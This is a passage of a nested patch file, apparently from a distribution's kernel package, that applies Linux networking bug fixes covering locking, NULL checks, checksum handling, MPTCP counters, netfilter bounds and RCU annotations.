+ 	if (priv_new) {
+ 		/* Someone was faster than us, use their priv and roll
+ 		 * back our's.
+ 		 */
+ 		kref_get(&priv_new->rx_kref);
+-		spin_unlock(&j1939_netdev_lock);
++		mutex_unlock(&j1939_netdev_lock);
+ 		dev_put(ndev);
+ 		kfree(priv);
+ 		return priv_new;
+ 	}
+ 	j1939_priv_set(ndev, priv);
+-	spin_unlock(&j1939_netdev_lock);
+ 
+ 	ret = j1939_can_rx_register(priv);
+ 	if (ret < 0)
+ 		goto out_priv_put;
+ 
++	mutex_unlock(&j1939_netdev_lock);
+ 	return priv;
+ 
+  out_priv_put:
+ 	j1939_priv_set(ndev, NULL);
++	mutex_unlock(&j1939_netdev_lock);
++
+ 	dev_put(ndev);
+ 	kfree(priv);
+ 
+@@ -308,7 +310,7 @@ struct j1939_priv *j1939_netdev_start(struct net_device *ndev)
+ 
+ void j1939_netdev_stop(struct j1939_priv *priv)
+ {
+-	kref_put_lock(&priv->rx_kref, __j1939_rx_release, &j1939_netdev_lock);
++	kref_put_mutex(&priv->rx_kref, __j1939_rx_release, &j1939_netdev_lock);
+ 	j1939_priv_put(priv);
+ }
+ 
+diff --git a/net/can/j1939/socket.c b/net/can/j1939/socket.c
+index 4fb3a99b5f67e..9c828067b4481 100644
+--- a/net/can/j1939/socket.c
++++ b/net/can/j1939/socket.c
+@@ -1088,6 +1088,11 @@ void j1939_sk_errqueue(struct j1939_session *session,
+ 
+ void j1939_sk_send_loop_abort(struct sock *sk, int err)
+ {
++	struct j1939_sock *jsk = j1939_sk(sk);
++
++	if (jsk->state & J1939_SOCK_ERRQUEUE)
++		return;
++
+ 	sk->sk_err = err;
+ 
+ 	sk_error_report(sk);
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 93d430693ca0f..a2e3c6470ab3f 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -4483,8 +4483,10 @@ static int get_rps_cpu(struct net_device *dev, struct sk_buff *skb,
+ 		u32 next_cpu;
+ 		u32 ident;
+ 
+-		/* First check into global flow table if there is a match */
+-		ident = sock_flow_table->ents[hash & sock_flow_table->mask];
++		/* First check into global flow table if there is a match.
++		 * This READ_ONCE() pairs with WRITE_ONCE() from rps_record_sock_flow().
++		 */
++		ident = READ_ONCE(sock_flow_table->ents[hash & sock_flow_table->mask]);
+ 		if ((ident ^ hash) & ~rps_cpu_mask)
+ 			goto try_rps;
+ 
+@@ -10516,7 +10518,7 @@ struct netdev_queue *dev_ingress_queue_create(struct net_device *dev)
+ 		return NULL;
+ 	netdev_init_one_queue(dev, queue, NULL);
+ 	RCU_INIT_POINTER(queue->qdisc, &noop_qdisc);
+-	queue->qdisc_sleeping = &noop_qdisc;
++	RCU_INIT_POINTER(queue->qdisc_sleeping, &noop_qdisc);
+ 	rcu_assign_pointer(dev->ingress_queue, queue);
+ #endif
+ 	return queue;
+diff --git a/net/core/skmsg.c b/net/core/skmsg.c
+index 9e0f694515636..65fb6f5b21b28 100644
+--- a/net/core/skmsg.c
++++ b/net/core/skmsg.c
+@@ -1205,7 +1205,8 @@ static void sk_psock_verdict_data_ready(struct sock *sk)
+ 
+ 		rcu_read_lock();
+ 		psock = sk_psock(sk);
+-		psock->saved_data_ready(sk);
++		if (psock)
++			psock->saved_data_ready(sk);
+ 		rcu_read_unlock();
+ 	}
+ }
+diff --git a/net/ipv4/sysctl_net_ipv4.c b/net/ipv4/sysctl_net_ipv4.c
+index 39dbeb6071965..f68762ce4d8a3 100644
+--- a/net/ipv4/sysctl_net_ipv4.c
++++ b/net/ipv4/sysctl_net_ipv4.c
+@@ -34,8 +34,8 @@ static int ip_ttl_min = 1;
+ static int ip_ttl_max = 255;
+ static int tcp_syn_retries_min = 1;
+ static int tcp_syn_retries_max = MAX_TCP_SYNCNT;
+-static int ip_ping_group_range_min[] = { 0, 0 };
+-static int ip_ping_group_range_max[] = { GID_T_MAX, GID_T_MAX };
++static unsigned long ip_ping_group_range_min[] = { 0, 0 };
++static unsigned long ip_ping_group_range_max[] = { GID_T_MAX, GID_T_MAX };
+ static u32 u32_max_div_HZ = UINT_MAX / HZ;
+ static int one_day_secs = 24 * 3600;
+ static u32 fib_multipath_hash_fields_all_mask __maybe_unused =
+@@ -162,7 +162,7 @@ static int ipv4_ping_group_range(struct ctl_table *table, int write,
+ {
+ 	struct user_namespace *user_ns = current_user_ns();
+ 	int ret;
+-	gid_t urange[2];
++	unsigned long urange[2];
+ 	kgid_t low, high;
+ 	struct ctl_table tmp = {
+ 		.data = &urange,
+@@ -175,7 +175,7 @@ static int ipv4_ping_group_range(struct ctl_table *table, int write,
+ 	inet_get_ping_group_range_table(table, &low, &high);
+ 	urange[0] = from_kgid_munged(user_ns, low);
+ 	urange[1] = from_kgid_munged(user_ns, high);
+-	ret = proc_dointvec_minmax(&tmp, write, buffer, lenp, ppos);
++	ret = proc_doulongvec_minmax(&tmp, write, buffer, lenp, ppos);
+ 
+ 	if (write && ret == 0) {
+ 		low = make_kgid(user_ns, urange[0]);
+diff --git a/net/ipv4/tcp_offload.c b/net/ipv4/tcp_offload.c
+index 45dda78893870..4851211aa60d6 100644
+--- a/net/ipv4/tcp_offload.c
++++ b/net/ipv4/tcp_offload.c
+@@ -60,12 +60,12 @@ struct sk_buff *tcp_gso_segment(struct sk_buff *skb,
+ 	struct tcphdr *th;
+ 	unsigned int thlen;
+ 	unsigned int seq;
+-	__be32 delta;
+ 	unsigned int oldlen;
+ 	unsigned int mss;
+ 	struct sk_buff *gso_skb = skb;
+ 	__sum16 newcheck;
+ 	bool ooo_okay, copy_destructor;
++	__wsum delta;
+ 
+ 	th = tcp_hdr(skb);
+ 	thlen = th->doff * 4;
+@@ -75,7 +75,7 @@ struct sk_buff *tcp_gso_segment(struct sk_buff *skb,
+ 	if (!pskb_may_pull(skb, thlen))
+ 		goto out;
+ 
+-	oldlen = (u16)~skb->len;
++	oldlen = ~skb->len;
+ 	__skb_pull(skb, thlen);
+ 
+ 	mss = skb_shinfo(skb)->gso_size;
+@@ -110,7 +110,7 @@ struct sk_buff *tcp_gso_segment(struct sk_buff *skb,
+ 	if (skb_is_gso(segs))
+ 		mss *= skb_shinfo(segs)->gso_segs;
+ 
+-	delta = htonl(oldlen + (thlen + mss));
++	delta = (__force __wsum)htonl(oldlen + thlen + mss);
+ 
+ 	skb = segs;
+ 	th = tcp_hdr(skb);
+@@ -119,8 +119,7 @@ struct sk_buff *tcp_gso_segment(struct sk_buff *skb,
+ 	if (unlikely(skb_shinfo(gso_skb)->tx_flags & SKBTX_SW_TSTAMP))
+ 		tcp_gso_tstamp(segs, skb_shinfo(gso_skb)->tskey, seq, mss);
+ 
+-	newcheck = ~csum_fold((__force __wsum)((__force u32)th->check +
+-					       (__force u32)delta));
++	newcheck = ~csum_fold(csum_add(csum_unfold(th->check), delta));
+ 
+ 	while (skb->next) {
+ 		th->fin = th->psh = 0;
+@@ -165,11 +164,11 @@ struct sk_buff *tcp_gso_segment(struct sk_buff *skb,
+ 			WARN_ON_ONCE(refcount_sub_and_test(-delta, &skb->sk->sk_wmem_alloc));
+ 	}
+ 
+-	delta = htonl(oldlen + (skb_tail_pointer(skb) -
+-				skb_transport_header(skb)) +
+-		      skb->data_len);
+-	th->check = ~csum_fold((__force __wsum)((__force u32)th->check +
+-				(__force u32)delta));
++	delta = (__force __wsum)htonl(oldlen +
++				      (skb_tail_pointer(skb) -
++				       skb_transport_header(skb)) +
++				      skb->data_len);
++	th->check = ~csum_fold(csum_add(csum_unfold(th->check), delta));
+ 	if (skb->ip_summed == CHECKSUM_PARTIAL)
+ 		gso_reset_checksum(skb, ~th->check);
+ 	else
+diff --git a/net/ipv6/exthdrs.c b/net/ipv6/exthdrs.c
+index a8d961d3a477f..5fa0e37305d9d 100644
+--- a/net/ipv6/exthdrs.c
++++ b/net/ipv6/exthdrs.c
+@@ -569,24 +569,6 @@ looped_back:
+ 		return -1;
+ 	}
+ 
+-	if (skb_cloned(skb)) {
+-		if (pskb_expand_head(skb, IPV6_RPL_SRH_WORST_SWAP_SIZE, 0,
+-				     GFP_ATOMIC)) {
+-			__IP6_INC_STATS(net, ip6_dst_idev(skb_dst(skb)),
+-					IPSTATS_MIB_OUTDISCARDS);
+-			kfree_skb(skb);
+-			return -1;
+-		}
+-	} else {
+-		err = skb_cow_head(skb, IPV6_RPL_SRH_WORST_SWAP_SIZE);
+-		if (unlikely(err)) {
+-			kfree_skb(skb);
+-			return -1;
+-		}
+-	}
+-
+-	hdr = (struct ipv6_rpl_sr_hdr *)skb_transport_header(skb);
+-
+ 	if (!pskb_may_pull(skb, ipv6_rpl_srh_size(n, hdr->cmpri,
+ 						  hdr->cmpre))) {
+ 		kfree_skb(skb);
+@@ -630,6 +612,17 @@ looped_back:
+ 	skb_pull(skb, ((hdr->hdrlen + 1) << 3));
+ 	skb_postpull_rcsum(skb, oldhdr,
+ 			   sizeof(struct ipv6hdr) + ((hdr->hdrlen + 1) << 3));
++	if (unlikely(!hdr->segments_left)) {
++		if (pskb_expand_head(skb, sizeof(struct ipv6hdr) + ((chdr->hdrlen + 1) << 3), 0,
++				     GFP_ATOMIC)) {
++			__IP6_INC_STATS(net, ip6_dst_idev(skb_dst(skb)), IPSTATS_MIB_OUTDISCARDS);
++			kfree_skb(skb);
++			kfree(buf);
++			return -1;
++		}
++
++		oldhdr = ipv6_hdr(skb);
++	}
+ 	skb_push(skb, ((chdr->hdrlen + 1) << 3) + sizeof(struct ipv6hdr));
+ 	skb_reset_network_header(skb);
+ 	skb_mac_header_rebuild(skb);
+diff --git a/net/mac80211/he.c b/net/mac80211/he.c
+index 729f261520c77..0322abae08250 100644
+--- a/net/mac80211/he.c
++++ b/net/mac80211/he.c
+@@ -3,7 +3,7 @@
+  * HE handling
+  *
+  * Copyright(c) 2017 Intel Deutschland GmbH
+- * Copyright(c) 2019 - 2022 Intel Corporation
++ * Copyright(c) 2019 - 2023 Intel Corporation
+  */
+ 
+ #include "ieee80211_i.h"
+@@ -114,6 +114,7 @@ ieee80211_he_cap_ie_to_sta_he_cap(struct ieee80211_sub_if_data *sdata,
+ 				  struct link_sta_info *link_sta)
+ {
+ 	struct ieee80211_sta_he_cap *he_cap = &link_sta->pub->he_cap;
++	const struct ieee80211_sta_he_cap *own_he_cap_ptr;
+ 	struct ieee80211_sta_he_cap own_he_cap;
+ 	struct ieee80211_he_cap_elem *he_cap_ie_elem = (void *)he_cap_ie;
+ 	u8 he_ppe_size;
+@@ -123,12 +124,16 @@ ieee80211_he_cap_ie_to_sta_he_cap(struct ieee80211_sub_if_data *sdata,
+ 
+ 	memset(he_cap, 0, sizeof(*he_cap));
+ 
+-	if (!he_cap_ie ||
+-	    !ieee80211_get_he_iftype_cap(sband,
+-					 ieee80211_vif_type_p2p(&sdata->vif)))
++	if (!he_cap_ie)
+ 		return;
+ 
+-	own_he_cap = sband->iftype_data->he_cap;
++	own_he_cap_ptr =
++		ieee80211_get_he_iftype_cap(sband,
++					    ieee80211_vif_type_p2p(&sdata->vif));
++	if (!own_he_cap_ptr)
++		return;
++
++	own_he_cap = *own_he_cap_ptr;
+ 
+ 	/* Make sure size is OK */
+ 	mcs_nss_size = ieee80211_he_mcs_nss_size(he_cap_ie_elem);
+diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c
+index 0125b3e6175b7..dc9e7eb7dd857 100644
+--- a/net/mac80211/mlme.c
++++ b/net/mac80211/mlme.c
+@@ -1143,6 +1143,7 @@ static void ieee80211_add_non_inheritance_elem(struct sk_buff *skb,
+ 					       const u16 *inner)
+ {
+ 	unsigned int skb_len = skb->len;
++	bool at_extension = false;
+ 	bool added = false;
+ 	int i, j;
+ 	u8 *len, *list_len = NULL;
+@@ -1154,7 +1155,6 @@ static void ieee80211_add_non_inheritance_elem(struct sk_buff *skb,
+ 	for (i = 0; i < PRESENT_ELEMS_MAX && outer[i]; i++) {
+ 		u16 elem = outer[i];
+ 		bool have_inner = false;
+-		bool at_extension = false;
+ 
+ 		/* should at least be sorted in the sense of normal -> ext */
+ 		WARN_ON(at_extension && elem < PRESENT_ELEM_EXT_OFFS);
+@@ -1183,8 +1183,14 @@ static void ieee80211_add_non_inheritance_elem(struct sk_buff *skb,
+ 		}
+ 		*list_len += 1;
+ 		skb_put_u8(skb, (u8)elem);
++		added = true;
+ 	}
+ 
++	/* if we added a list but no extension list, make a zero-len one */
++	if (added && (!at_extension || !list_len))
++		skb_put_u8(skb, 0);
++
++	/* if nothing added remove extension element completely */
+ 	if (!added)
+ 		skb_trim(skb, skb_len);
+ 	else
+diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
+index 44e407e1a14c7..0f81492da0b46 100644
+--- a/net/mac80211/rx.c
++++ b/net/mac80211/rx.c
+@@ -4857,7 +4857,9 @@ static bool ieee80211_prepare_and_rx_handle(struct ieee80211_rx_data *rx,
+ 	}
+ 
+ 	if (unlikely(rx->sta && rx->sta->sta.mlo) &&
+-	    is_unicast_ether_addr(hdr->addr1)) {
++	    is_unicast_ether_addr(hdr->addr1) &&
++	    !ieee80211_is_probe_resp(hdr->frame_control) &&
++	    !ieee80211_is_beacon(hdr->frame_control)) {
+ 		/* translate to MLD addresses */
+ 		if (ether_addr_equal(link->conf->addr, hdr->addr1))
+ 			ether_addr_copy(hdr->addr1, rx->sdata->vif.addr);
+diff --git a/net/mptcp/pm.c b/net/mptcp/pm.c
+index 70f0ced3ca86e..10c288a0cb0c2 100644
+--- a/net/mptcp/pm.c
++++ b/net/mptcp/pm.c
+@@ -87,8 +87,15 @@ bool mptcp_pm_allow_new_subflow(struct mptcp_sock *msk)
+ 	unsigned int subflows_max;
+ 	int ret = 0;
+ 
+-	if (mptcp_pm_is_userspace(msk))
+-		return mptcp_userspace_pm_active(msk);
++	if (mptcp_pm_is_userspace(msk)) {
++		if (mptcp_userspace_pm_active(msk)) {
++			spin_lock_bh(&pm->lock);
++			pm->subflows++;
++			spin_unlock_bh(&pm->lock);
++			return true;
++		}
++		return false;
++	}
+ 
+ 	subflows_max = mptcp_pm_get_subflows_max(msk);
+ 
+@@ -181,8 +188,16 @@ void mptcp_pm_subflow_check_next(struct mptcp_sock *msk, const struct sock *ssk,
+ 	struct mptcp_pm_data *pm = &msk->pm;
+ 	bool update_subflows;
+ 
+-	update_subflows = (subflow->request_join || subflow->mp_join) &&
+-			  mptcp_pm_is_kernel(msk);
++	update_subflows = subflow->request_join || subflow->mp_join;
++	if (mptcp_pm_is_userspace(msk)) {
++		if (update_subflows) {
++			spin_lock_bh(&pm->lock);
++			pm->subflows--;
++			spin_unlock_bh(&pm->lock);
++		}
++		return;
++	}
++
+ 	if (!READ_ONCE(pm->work_pending) && !update_subflows)
+ 		return;
+ 
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 1c69e476f4ad6..01d34ee4525ea 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -1550,6 +1550,24 @@ static int mptcp_nl_cmd_del_addr(struct sk_buff *skb, struct genl_info *info)
+ 	return ret;
+ }
+ 
++void mptcp_pm_remove_addrs(struct mptcp_sock *msk, struct list_head *rm_list)
++{
++	struct mptcp_rm_list alist = { .nr = 0 };
++	struct mptcp_pm_addr_entry *entry;
++
++	list_for_each_entry(entry, rm_list, list) {
++		remove_anno_list_by_saddr(msk, &entry->addr);
++		if (alist.nr < MPTCP_RM_IDS_MAX)
++			alist.ids[alist.nr++] = entry->addr.id;
++	}
++
++	if (alist.nr) {
++		spin_lock_bh(&msk->pm.lock);
++		mptcp_pm_remove_addr(msk, &alist);
++		spin_unlock_bh(&msk->pm.lock);
++	}
++}
++
+ void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+ 					struct list_head *rm_list)
+ {
+diff --git a/net/mptcp/pm_userspace.c b/net/mptcp/pm_userspace.c
+index c1d6cd5b188c2..8a2aa63caa51f 100644
+--- a/net/mptcp/pm_userspace.c
++++ b/net/mptcp/pm_userspace.c
+@@ -69,6 +69,7 @@ int mptcp_userspace_pm_append_new_local_addr(struct mptcp_sock *msk,
+ 							MPTCP_PM_MAX_ADDR_ID + 1,
+ 							1);
+ 		list_add_tail_rcu(&e->list, &msk->pm.userspace_pm_local_addr_list);
++		msk->pm.local_addr_used++;
+ 		ret = e->addr.id;
+ 	} else if (match) {
+ 		ret = entry->addr.id;
+@@ -78,6 +79,31 @@ int mptcp_userspace_pm_append_new_local_addr(struct mptcp_sock *msk,
+ 	return ret;
+ }
+ 
++/* If the subflow is closed from the other peer (not via a
++ * subflow destroy command then), we want to keep the entry
++ * not to assign the same ID to another address and to be
++ * able to send RM_ADDR after the removal of the subflow.
++ */
++static int mptcp_userspace_pm_delete_local_addr(struct mptcp_sock *msk,
++						struct mptcp_pm_addr_entry *addr)
++{
++	struct mptcp_pm_addr_entry *entry, *tmp;
++
++	list_for_each_entry_safe(entry, tmp, &msk->pm.userspace_pm_local_addr_list, list) {
++		if (mptcp_addresses_equal(&entry->addr, &addr->addr, false)) {
++			/* TODO: a refcount is needed because the entry can
++			 * be used multiple times (e.g. fullmesh mode).
++			 */
++			list_del_rcu(&entry->list);
++			kfree(entry);
++			msk->pm.local_addr_used--;
++			return 0;
++		}
++	}
++
++	return -EINVAL;
++}
++
+ int mptcp_userspace_pm_get_flags_and_ifindex_by_id(struct mptcp_sock *msk,
+ 						   unsigned int id,
+ 						   u8 *flags, int *ifindex)
+@@ -170,6 +196,7 @@ int mptcp_nl_cmd_announce(struct sk_buff *skb, struct genl_info *info)
+ 	spin_lock_bh(&msk->pm.lock);
+ 
+ 	if (mptcp_pm_alloc_anno_list(msk, &addr_val)) {
++		msk->pm.add_addr_signaled++;
+ 		mptcp_pm_announce_addr(msk, &addr_val.addr, false);
+ 		mptcp_pm_nl_addr_send_ack(msk);
+ 	}
+@@ -231,7 +258,7 @@ int mptcp_nl_cmd_remove(struct sk_buff *skb, struct genl_info *info)
+ 
+ 	list_move(&match->list, &free_list);
+ 
+-	mptcp_pm_remove_addrs_and_subflows(msk, &free_list);
++	mptcp_pm_remove_addrs(msk, &free_list);
+ 
+ 	release_sock((struct sock *)msk);
+ 
+@@ -250,6 +277,7 @@ int mptcp_nl_cmd_sf_create(struct sk_buff *skb, struct genl_info *info)
+ 	struct nlattr *raddr = info->attrs[MPTCP_PM_ATTR_ADDR_REMOTE];
+ 	struct nlattr *token = info->attrs[MPTCP_PM_ATTR_TOKEN];
+ 	struct nlattr *laddr = info->attrs[MPTCP_PM_ATTR_ADDR];
++	struct mptcp_pm_addr_entry local = { 0 };
+ 	struct mptcp_addr_info addr_r;
+ 	struct mptcp_addr_info addr_l;
+ 	struct mptcp_sock *msk;
+@@ -301,12 +329,26 @@ int mptcp_nl_cmd_sf_create(struct sk_buff *skb, struct genl_info *info)
+ 		goto create_err;
+ 	}
+ 
++	local.addr = addr_l;
++	err = mptcp_userspace_pm_append_new_local_addr(msk, &local);
++	if (err < 0) {
++		GENL_SET_ERR_MSG(info, "did not match address and id");
++		goto create_err;
++	}
++
+ 	lock_sock(sk);
+ 
+ 	err = __mptcp_subflow_connect(sk, &addr_l, &addr_r);
+ 
+ 	release_sock(sk);
+ 
++	spin_lock_bh(&msk->pm.lock);
++	if (err)
++		mptcp_userspace_pm_delete_local_addr(msk, &local);
++	else
++		msk->pm.subflows++;
++	spin_unlock_bh(&msk->pm.lock);
++
+  create_err:
+ 	sock_put((struct sock *)msk);
+ 	return err;
+@@ -419,7 +461,11 @@ int mptcp_nl_cmd_sf_destroy(struct sk_buff *skb, struct genl_info *info)
+ 	ssk = mptcp_nl_find_ssk(msk, &addr_l, &addr_r);
+ 	if (ssk) {
+ 		struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(ssk);
++		struct mptcp_pm_addr_entry entry = { .addr = addr_l };
+ 
++		spin_lock_bh(&msk->pm.lock);
++		mptcp_userspace_pm_delete_local_addr(msk, &entry);
++		spin_unlock_bh(&msk->pm.lock);
+ 		mptcp_subflow_shutdown(sk, ssk, RCV_SHUTDOWN | SEND_SHUTDOWN);
+ 		mptcp_close_ssk(sk, ssk, subflow);
+ 		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_RMSUBFLOW);
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 55fc5e42082e0..fc00dd587a297 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -820,6 +820,7 @@ int mptcp_pm_announce_addr(struct mptcp_sock *msk,
+ 			   bool echo);
+ int mptcp_pm_remove_addr(struct mptcp_sock *msk, const struct mptcp_rm_list *rm_list);
+ int mptcp_pm_remove_subflow(struct mptcp_sock *msk, const struct mptcp_rm_list *rm_list);
++void mptcp_pm_remove_addrs(struct mptcp_sock *msk, struct list_head *rm_list);
+ void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+ 					struct list_head *rm_list);
+ 
+diff --git a/net/netfilter/ipset/ip_set_core.c b/net/netfilter/ipset/ip_set_core.c
+index 46ebee9400dab..9a6b64779e644 100644
+--- a/net/netfilter/ipset/ip_set_core.c
++++ b/net/netfilter/ipset/ip_set_core.c
+@@ -1694,6 +1694,14 @@ call_ad(struct net *net, struct sock *ctnl, struct sk_buff *skb,
+ 	bool eexist = flags & IPSET_FLAG_EXIST, retried = false;
+ 
+ 	do {
++		if (retried) {
++			__ip_set_get(set);
++			nfnl_unlock(NFNL_SUBSYS_IPSET);
++			cond_resched();
++			nfnl_lock(NFNL_SUBSYS_IPSET);
++			__ip_set_put(set);
++		}
++
+ 		ip_set_lock(set);
+ 		ret = set->variant->uadt(set, tb, adt, &lineno, flags, retried);
+ 		ip_set_unlock(set);
+diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
+index a0e9c7af08467..7960262966094 100644
+--- a/net/netfilter/nf_conntrack_core.c
++++ b/net/netfilter/nf_conntrack_core.c
+@@ -2277,6 +2277,9 @@ static int nf_confirm_cthelper(struct sk_buff *skb, struct nf_conn *ct,
+ 		return 0;
+ 
+ 	helper = rcu_dereference(help->helper);
++	if (!helper)
++		return 0;
++
+ 	if (!(helper->flags & NF_CT_HELPER_F_USERSPACE))
+ 		return 0;
+ 
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 31775d54f4b40..437891cb8c417 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -8723,7 +8723,7 @@ static int nf_tables_commit_chain_prepare(struct net *net, struct nft_chain *cha
+ 				continue;
+ 			}
+ 
+-			if (WARN_ON_ONCE(data + expr->ops->size > data_boundary))
++			if (WARN_ON_ONCE(data + size + expr->ops->size > data_boundary))
+ 				return -ENOMEM;
+ 
+ 			memcpy(data + size, expr, expr->ops->size);
+diff --git a/net/netfilter/nft_bitwise.c b/net/netfilter/nft_bitwise.c
+index e6e402b247d09..b84312df9aa1e 100644
+--- a/net/netfilter/nft_bitwise.c
++++ b/net/netfilter/nft_bitwise.c
+@@ -322,7 +322,7 @@ static bool nft_bitwise_reduce(struct nft_regs_track *track,
+ 	dreg = priv->dreg;
+ 	regcount = DIV_ROUND_UP(priv->len, NFT_REG32_SIZE);
+ 	for (i = 0; i < regcount; i++, dreg++)
+-		track->regs[priv->dreg].bitwise = expr;
++		track->regs[dreg].bitwise = expr;
+ 
+ 	return false;
+ }
+diff --git a/net/sched/act_police.c b/net/sched/act_police.c
+index 0adb26e366a7b..94be21378e7ca 100644
+--- a/net/sched/act_police.c
++++ b/net/sched/act_police.c
+@@ -355,23 +355,23 @@ static int tcf_police_dump(struct sk_buff *skb, struct tc_action *a,
+ 	opt.burst = PSCHED_NS2TICKS(p->tcfp_burst);
+ 	if (p->rate_present) {
+ 		psched_ratecfg_getrate(&opt.rate, &p->rate);
+-		if ((police->params->rate.rate_bytes_ps >= (1ULL << 32)) &&
++		if ((p->rate.rate_bytes_ps >= (1ULL << 32)) &&
+ 		    nla_put_u64_64bit(skb, TCA_POLICE_RATE64,
+-				      police->params->rate.rate_bytes_ps,
++				      p->rate.rate_bytes_ps,
+ 				      TCA_POLICE_PAD))
+ 			goto nla_put_failure;
+ 	}
+ 	if (p->peak_present) {
+ 		psched_ratecfg_getrate(&opt.peakrate, &p->peak);
+-		if ((police->params->peak.rate_bytes_ps >= (1ULL << 32)) &&
++		if ((p->peak.rate_bytes_ps >= (1ULL << 32)) &&
+ 		    nla_put_u64_64bit(skb, TCA_POLICE_PEAKRATE64,
+-				      police->params->peak.rate_bytes_ps,
++				      p->peak.rate_bytes_ps,
+ 				      TCA_POLICE_PAD))
+ 			goto nla_put_failure;
+ 	}
+ 	if (p->pps_present) {
+ 		if (nla_put_u64_64bit(skb, TCA_POLICE_PKTRATE64,
+-				      police->params->ppsrate.rate_pkts_ps,
++				      p->ppsrate.rate_pkts_ps,
+ 				      TCA_POLICE_PAD))
+ 			goto nla_put_failure;
+ 		if (nla_put_u64_64bit(skb, TCA_POLICE_PKTBURST64,
+diff --git a/net/sched/cls_api.c b/net/sched/cls_api.c
+index 7b2aa04a7cdfd..abaf75300497d 100644
+--- a/net/sched/cls_api.c
++++ b/net/sched/cls_api.c
+@@ -41,8 +41,6 @@
+ #include <net/tc_act/tc_gate.h>
+ #include <net/flow_offload.h>
+ 
+-extern const struct nla_policy rtm_tca_policy[TCA_MAX + 1];
+-
+ /* The list of all installed classifier types */
+ static LIST_HEAD(tcf_proto_base);
+ 
+@@ -2782,6 +2780,7 @@ static int tc_chain_tmplt_add(struct tcf_chain *chain, struct net *net,
+ 		return PTR_ERR(ops);
+ 	if (!ops->tmplt_create || !ops->tmplt_destroy || !ops->tmplt_dump) {
+ 		NL_SET_ERR_MSG(extack, "Chain templates are not supported with specified classifier");
++		module_put(ops->owner);
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+diff --git a/net/sched/sch_api.c b/net/sched/sch_api.c
+index f6a7b876d5954..6fb345ec22641 100644
+--- a/net/sched/sch_api.c
++++ b/net/sched/sch_api.c
+@@ -308,7 +308,7 @@ struct Qdisc *qdisc_lookup(struct net_device *dev, u32 handle)
+ 
+ 	if (dev_ingress_queue(dev))
+ 		q = qdisc_match_from_root(
+-			dev_ingress_queue(dev)->qdisc_sleeping,
++			rtnl_dereference(dev_ingress_queue(dev)->qdisc_sleeping),
+ 			handle);
+ out:
+ 	return q;
+@@ -327,7 +327,8 @@ struct Qdisc *qdisc_lookup_rcu(struct net_device *dev, u32 handle)
+ 
+ 	nq = dev_ingress_queue_rcu(dev);
+ 	if (nq)
+-		q = qdisc_match_from_root(nq->qdisc_sleeping, handle);
++		q = qdisc_match_from_root(rcu_dereference(nq->qdisc_sleeping),
++					  handle);
+ out:
+ 	return q;
+ }
+@@ -633,8 +634,13 @@ EXPORT_SYMBOL(qdisc_watchdog_init);
+ void qdisc_watchdog_schedule_range_ns(struct qdisc_watchdog *wd, u64 expires,
+ 				      u64 delta_ns)
+ {
+-	if (test_bit(__QDISC_STATE_DEACTIVATED,
+-		     &qdisc_root_sleeping(wd->qdisc)->state))
++	bool deactivated;
++
++	rcu_read_lock();
++	deactivated = test_bit(__QDISC_STATE_DEACTIVATED,
++			       &qdisc_root_sleeping(wd->qdisc)->state);
++	rcu_read_unlock();
++	if (deactivated)
+ 		return;
+ 
+ 	if (hrtimer_is_queued(&wd->timer)) {
+@@ -1473,7 +1479,7 @@ static int tc_get_qdisc(struct sk_buff *skb, struct nlmsghdr *n,
+ 				}
+ 				q = qdisc_leaf(p, clid);
+ 			} else if (dev_ingress_queue(dev)) {
+-				q = dev_ingress_queue(dev)->qdisc_sleeping;
++				q = rtnl_dereference(dev_ingress_queue(dev)->qdisc_sleeping);
+ 			}
+ 		} else {
+ 			q = rtnl_dereference(dev->qdisc);
+@@ -1559,7 +1565,7 @@ replay:
+ 				}
+ 				q = qdisc_leaf(p, clid);
+ 			} else if (dev_ingress_queue_create(dev)) {
+-				q = dev_ingress_queue(dev)->qdisc_sleeping;
++				q = rtnl_dereference(dev_ingress_queue(dev)->qdisc_sleeping);
+ 			}
+ 		} else {
+ 			q = rtnl_dereference(dev->qdisc);
+@@ -1800,8 +1806,8 @@ static int tc_dump_qdisc(struct sk_buff *skb, struct netlink_callback *cb)
+ 
+ 		dev_queue = dev_ingress_queue(dev);
+ 		if (dev_queue &&
+-		    tc_dump_qdisc_root(dev_queue->qdisc_sleeping, skb, cb,
+-				       &q_idx, s_q_idx, false,
++		    tc_dump_qdisc_root(rtnl_dereference(dev_queue->qdisc_sleeping),
++				       skb, cb, &q_idx, s_q_idx, false,
+ 				       tca[TCA_DUMP_INVISIBLE]) < 0)
+ 			goto done;
+ 
+@@ -2239,8 +2245,8 @@ static int tc_dump_tclass(struct sk_buff *skb, struct netlink_callback *cb)
+ 
+ 	dev_queue = dev_ingress_queue(dev);
+ 	if (dev_queue &&
+-	    tc_dump_tclass_root(dev_queue->qdisc_sleeping, skb, tcm, cb,
+-				&t, s_t, false) < 0)
++	    tc_dump_tclass_root(rtnl_dereference(dev_queue->qdisc_sleeping),
++				skb, tcm, cb, &t, s_t, false) < 0)
+ 		goto done;
+ 
+ done:
+diff --git a/net/sched/sch_fq_pie.c b/net/sched/sch_fq_pie.c
+index 6980796d435d9..591d87d5e5c0f 100644
+--- a/net/sched/sch_fq_pie.c
++++ b/net/sched/sch_fq_pie.c
+@@ -201,6 +201,11 @@ out:
+ 	return NET_XMIT_CN;
+ }
+ 
++static struct netlink_range_validation fq_pie_q_range = {
++	.min = 1,
++	.max = 1 << 20,
++};
++
+ static const struct nla_policy fq_pie_policy[TCA_FQ_PIE_MAX + 1] = {
+ 	[TCA_FQ_PIE_LIMIT]		= {.type = NLA_U32},
